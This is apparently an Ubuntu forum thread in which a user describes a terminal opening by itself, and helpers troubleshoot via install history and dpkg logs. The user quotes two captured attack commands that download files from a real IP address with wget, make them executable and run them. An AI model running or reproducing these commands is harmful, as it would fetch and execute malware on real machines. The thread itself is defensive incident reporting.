I was busy scanning documents when suddenly, Terminal popped up and started doing things on it’s own. I was quite surprised as I didn’t start anything. I managed to copy this command;
wget 46.166.131.230/update;wget 46.166.131.230/start;chmod +x update start;whoami
And then it wanted me to enter my password in a window, not in terminal
What is it?
DO NOT enter your password … looking at those files now.
It’s ok, I didn’t, I rebooted straight away.
It just came up wih this one too
pooky2483@pooky2483-ubuntu12:~$ wget 46.166.131.230/hole;chmod +x hole;./hole;exit
Now a light on my kbd is flashing, where Caps lock, Func lock, Num lock and and another one but I’m unsure which function it is.
Just did a reboot and found these in my ‘Home’ folder
What have you installed lately ? … namely stuff that’s not from the default repositories ?
Because those files are NOT good.
Nor is the fact that something was able to open your terminal and run commands … the only good news is it ovbiously couldn’t run anything as root.
[EDIT]
BTW, I’ve removed the attachments from your previous posting … I’ve already downloaded them from the quoted wget commands … but I don’t want to be hosting them on this forum.
I’ve only downloaded stuff from the Ubuntu Software Centre.
Is there somewhere that has a history of what the computer does, I’m sure I’ve seen it but cant remember where?
What does this stuff do that downloaded itself?
Looks like someone from Naperville, US is trying to get into your computer for funzies. Have you installed an PPA’s lately, or anything from a .deb?
You may wanna report the IP you posted in the wget commands to their ISP - Comcast. Although it could be as simple as the guy doesn’t even know it’s happening and a bot has took over his computer and is being used to target other people.
@Mark - Could you give me the file names please via PM 
Since and including;
XScreensaver
Ubuntu Tweak (Goes into System Settings Control Panel)
Gimp
Cant remember others, isn’t there an install history somewhere?
To see a list of installed programs go to the Ubuntu Software Centre > Installed.
Even if you’ve installed it by .deb(Others tab), it’ll be listed there. PPA’s are listed by their own tab. Use the little arrow to bring down the list of tabs.
I know there’s that but I’m on about something else that is on the system and it keeps a log of things of whats happend but I cant remember where it was. i.e. what program it was.
Log Viewer is probably what your on about.
Sounds like it but I can’t remember where it was?
The dpkg log is what you’re after … if you can’t find the “Log File Viewer” in the menus, run:
gnome-system-log
or you can browse for the logs at /var/log
Just as a matter of interest, what’s the output from:
dpkg -l | grep nginx
pooky2483@pooky2483-ubuntu12:~$ dpkg -l | grep nginx
pooky2483@pooky2483-ubuntu12:~$
Hi, I’ve reported this to the authorities, will let you know if anything comes back.
(it is an attempted hack, originates in Lithuania)
Can you tell me if you have automatic updates turned on?
I think it could be something to do with networking, I cant think of the name of it, it was one installed with the OS.
If you say a few, it might ring a bell.
And, yes MP, I do have updates turned on.
Let’s be clear about this … Mad Penguin isn’t asking you if the Update manager automatically opens periodically, but you still have to click a button to accept the updates … he’s asking if you’ve “specifically” enabled “Automatic Updates”, where updates can be downloaded and installed without ANY user intervention ?
I have no idea what you mean by:-
I think it could be something to do with networking, I cant think of the name of it, it was one installed with the OS
But I can’t see how anything that was installed by the OS would automatically open a terminal and run some malicious commands … but if you mean that a default networking protocol may have allowed someone to remotely access your PC, open a terminal, and run commands … I can’t see how ???
Nope, I’ve set it to just tell me of updates. See screenshot
I have no idea what you mean by:-
I think it could be something to do with networking, I cant think of the name of it, it was one installed with the OSBut I can’t see how anything that was installed by the OS would automatically open a terminal and run some malicious commands … but if you mean that a default networking protocol may have allowed someone to remotely access your PC, open a terminal, and run commands … I can’t see how ???
I will have a further look tomorrow after I’ve had some sleep,